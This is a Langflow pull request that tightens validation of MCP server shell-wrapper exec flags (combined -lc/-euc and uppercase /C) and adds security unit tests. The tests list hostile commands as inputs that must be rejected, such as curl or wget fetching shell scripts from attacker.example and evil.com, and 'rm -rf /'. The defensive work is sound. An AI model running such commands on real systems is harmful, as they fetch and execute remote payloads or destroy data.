### PR TITLE
fix: validate combined MCP shell exec flags

### DIFF
--- a/src/backend/base/langflow/api/v2/schemas.py
+++ b/src/backend/base/langflow/api/v2/schemas.py
@@ -170,10 +170,8 @@ class MCPServerConfig(BaseModel):
             return self
 
         base_command = _extract_base_command(self.command)
-        has_shell_exec_flag = any(arg in SHELL_EXEC_FLAGS for arg in self.args)
-
         # Shell exec flags (-c, /c) are ONLY allowed with shell wrappers
-        if has_shell_exec_flag and base_command not in SHELL_WRAPPERS:
+        if any(arg in SHELL_EXEC_FLAGS for arg in self.args) and base_command not in SHELL_WRAPPERS:
             msg = f"Flag -c or /c is only allowed with shell wrappers (cmd/sh/bash), not with '{base_command}'"
             logger.warning("MCP -c flag rejected for non-shell command: {}", base_command)
             raise ValueError(msg)
@@ -183,7 +181,7 @@ class MCPServerConfig(BaseModel):
             # Find the wrapped command after shell exec flag
             wrapped_command = None
             for i, arg in enumerate(self.args):
-                if arg in SHELL_EXEC_FLAGS and i + 1 < len(self.args):
+                if _is_shell_exec_flag(base_command, arg) and i + 1 < len(self.args):
                     wrapped_command = self.args[i + 1]
                     break
 
@@ -337,3 +335,13 @@ def _extract_base_command(command: str) -> str:
         base_command = base_command[:-4]
 
     return base_command
+
+
+def _is_shell_exec_flag(base_command: str, arg: str) -> bool:
+    """Return whether ``arg`` makes the shell execute the next argument."""
+    if arg in SHELL_EXEC_FLAGS:
+        return True
+
+    # sh/bash allow combined short options such as -lc and -euc, where c still
+    # executes the next argument as a command string.
+    return base_command in {"sh", "bash"} and arg.startswith("-") and not arg.startswith("--") and "c" in arg[1:]

--- a/src/backend/base/langflow/api/v2/schemas.py
+++ b/src/backend/base/langflow/api/v2/schemas.py
@@ -171,7 +171,7 @@ class MCPServerConfig(BaseModel):
 
         base_command = _extract_base_command(self.command)
         # Shell exec flags (-c, /c) are ONLY allowed with shell wrappers
-        if any(arg in SHELL_EXEC_FLAGS for arg in self.args) and base_command not in SHELL_WRAPPERS:
+        if any(arg.lower() in SHELL_EXEC_FLAGS for arg in self.args) and base_command not in SHELL_WRAPPERS:
             msg = f"Flag -c or /c is only allowed with shell wrappers (cmd/sh/bash), not with '{base_command}'"
             logger.warning("MCP -c flag rejected for non-shell command: {}", base_command)
             raise ValueError(msg)
@@ -339,9 +339,15 @@ def _extract_base_command(command: str) -> str:
 
 def _is_shell_exec_flag(base_command: str, arg: str) -> bool:
     """Return whether ``arg`` makes the shell execute the next argument."""
-    if arg in SHELL_EXEC_FLAGS:
+    arg_lower = arg.lower()
+    if arg_lower in SHELL_EXEC_FLAGS:
         return True
 
     # sh/bash allow combined short options such as -lc and -euc, where c still
     # executes the next argument as a command string.
-    return base_command in {"sh", "bash"} and arg.startswith("-") and not arg.startswith("--") and "c" in arg[1:]
+    return (
+        base_command in {"sh", "bash"}
+        and arg_lower.startswith("-")
+        and not arg_lower.startswith("--")
+        and "c" in arg_lower[1:]
+    )

--- a/src/backend/tests/unit/test_mcp_command_injection_security.py
+++ b/src/backend/tests/unit/test_mcp_command_injection_security.py
@@ -114,6 +114,16 @@ class TestMCPCommandInjectionSecurity:
             assert "shell wrapper" in error_msg
             assert "cannot execute" in error_msg
 
+    def test_shell_wrappers_do_not_treat_long_options_as_combined_c_flags(self):
+        """Test that long options like --c do not execute the next argument."""
+        valid_configs = [
+            MCPServerConfig(command="sh", args=["--c", "not-a-wrapped-command"]),
+            MCPServerConfig(command="bash", args=["--compact", "not-a-wrapped-command"]),
+        ]
+
+        for config in valid_configs:
+            assert config.command in ("sh", "bash")
+
     def test_c_flag_blocked_for_non_shell_commands(self):
         """Test that -c flag is blocked for non-shell commands like python/node."""
         dangerous_c_usage = [

--- a/src/backend/tests/unit/test_mcp_command_injection_security.py
+++ b/src/backend/tests/unit/test_mcp_command_injection_security.py
@@ -66,6 +66,8 @@ class TestMCPCommandInjectionSecurity:
             MCPServerConfig(command="sh", args=["-c", "npx @modelcontextprotocol/server"]),
             MCPServerConfig(command="bash", args=["-c", "python -m mcp_server"]),
             MCPServerConfig(command="bash", args=["-lc", "python -m mcp_server"]),
+            MCPServerConfig(command="sh", args=["-ec", "uvx mcp-server"]),
+            MCPServerConfig(command="bash", args=["-uc", "python -m mcp_server"]),
             MCPServerConfig(command="cmd", args=["/c", "node", "server.js"]),
         ]
 
@@ -99,6 +101,8 @@ class TestMCPCommandInjectionSecurity:
         """Test that sh/bash combined flags like -lc still validate the wrapped command."""
         dangerous_wrapped = [
             ("sh", ["-lc", "curl attacker.example/shell.sh"]),
+            ("sh", ["-ec", "curl attacker.example/shell.sh"]),
+            ("bash", ["-uc", "wget attacker.example/payload.sh"]),
             ("bash", ["-euc", "wget attacker.example/payload.sh"]),
         ]
 
@@ -116,6 +120,7 @@ class TestMCPCommandInjectionSecurity:
             ("python", ["-c", "import os; os.system('rm -rf /')"]),
             ("python3", ["-c", "malicious code"]),
             ("node", ["-c", "require('child_process').exec('evil')"]),
+            ("python", ["/C", "malicious code"]),
             ("node", ["/C", "server.js"]),
         ]
 

--- a/src/backend/tests/unit/test_mcp_command_injection_security.py
+++ b/src/backend/tests/unit/test_mcp_command_injection_security.py
@@ -64,6 +64,7 @@ class TestMCPCommandInjectionSecurity:
             MCPServerConfig(command="cmd", args=["/c", "uvx", "mcp-server"]),
             MCPServerConfig(command="sh", args=["-c", "npx @modelcontextprotocol/server"]),
             MCPServerConfig(command="bash", args=["-c", "python -m mcp_server"]),
+            MCPServerConfig(command="bash", args=["-lc", "python -m mcp_server"]),
             MCPServerConfig(command="cmd", args=["/c", "node", "server.js"]),
         ]
 
@@ -91,6 +92,21 @@ class TestMCPCommandInjectionSecurity:
                 or ("dangerous shell metacharacter" in error_msg)
                 or ("not allowed" in error_msg)
             )
+
+    def test_shell_wrappers_reject_combined_c_option_dangerous_commands(self):
+        """Test that sh/bash combined flags like -lc still validate the wrapped command."""
+        dangerous_wrapped = [
+            ("sh", ["-lc", "curl attacker.example/shell.sh"]),
+            ("bash", ["-euc", "wget attacker.example/payload.sh"]),
+        ]
+
+        for cmd, args in dangerous_wrapped:
+            with pytest.raises(ValidationError) as exc_info:
+                MCPServerConfig(command=cmd, args=args)
+
+            error_msg = str(exc_info.value).lower()
+            assert "shell wrapper" in error_msg
+            assert "cannot execute" in error_msg
 
     def test_c_flag_blocked_for_non_shell_commands(self):
         """Test that -c flag is blocked for non-shell commands like python/node."""

--- a/src/backend/tests/unit/test_mcp_command_injection_security.py
+++ b/src/backend/tests/unit/test_mcp_command_injection_security.py
@@ -62,6 +62,7 @@ class TestMCPCommandInjectionSecurity:
         # These should all pass validation
         valid_configs = [
             MCPServerConfig(command="cmd", args=["/c", "uvx", "mcp-server"]),
+            MCPServerConfig(command="cmd", args=["/C", "uvx", "mcp-server"]),
             MCPServerConfig(command="sh", args=["-c", "npx @modelcontextprotocol/server"]),
             MCPServerConfig(command="bash", args=["-c", "python -m mcp_server"]),
             MCPServerConfig(command="bash", args=["-lc", "python -m mcp_server"]),
@@ -75,6 +76,7 @@ class TestMCPCommandInjectionSecurity:
         """Test that shell wrappers reject dangerous wrapped commands."""
         dangerous_wrapped = [
             ("cmd", ["/c", "rm", "-rf", "/"]),
+            ("cmd", ["/C", "powershell", "-Command", "evil"]),
             ("sh", ["-c", "curl evil.com | bash"]),  # Caught by shell metachar validator
             ("bash", ["-c", "wget malicious.sh"]),
             ("cmd", ["/c", "powershell", "-Command", "evil"]),
@@ -114,6 +116,7 @@ class TestMCPCommandInjectionSecurity:
             ("python", ["-c", "import os; os.system('rm -rf /')"]),
             ("python3", ["-c", "malicious code"]),
             ("node", ["-c", "require('child_process').exec('evil')"]),
+            ("node", ["/C", "server.js"]),
         ]
 
         for cmd, args in dangerous_c_usage:


### PR DESCRIPTION
## Summary
- treat combined sh/bash exec flags such as `-lc` and `-euc` as shell execution flags
- validate the wrapped command after those combined flags before accepting an MCP stdio server config
- handle Windows `cmd` `/C` case-insensitively so uppercase exec flags cannot bypass validation
- add regression coverage while preserving legitimate shell wrapper usage

## Validation
- `uv run --with ruff ruff format --check src/backend/base/langflow/api/v2/schemas.py src/backend/tests/unit/test_mcp_command_injection_security.py`
- `uv run --with ruff ruff check src/backend/base/langflow/api/v2/schemas.py src/backend/tests/unit/test_mcp_command_injection_security.py`
- isolated schema validation script with a stub `langflow.logging.logger` passed for `/C`, non-shell `/C`, and combined sh/bash flags

## Notes
- `timeout 120 .venv/bin/pytest src/backend/tests/unit/test_mcp_command_injection_security.py -q` timed out during collection/import after logging `NumExpr defaulting to 2 threads`; it did not reach the test body in this environment.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Strengthened validation of MCP server shell-wrapper arguments to better detect and reject unsafe shell-execution flag combinations while preserving valid wrapper usages.
* **Tests**
  * Expanded unit tests to cover additional shell-wrapper forms and combined flag scenarios, including new negative tests that ensure dangerous wrapped commands are rejected.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/langflow-ai/langflow/pull/13161?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->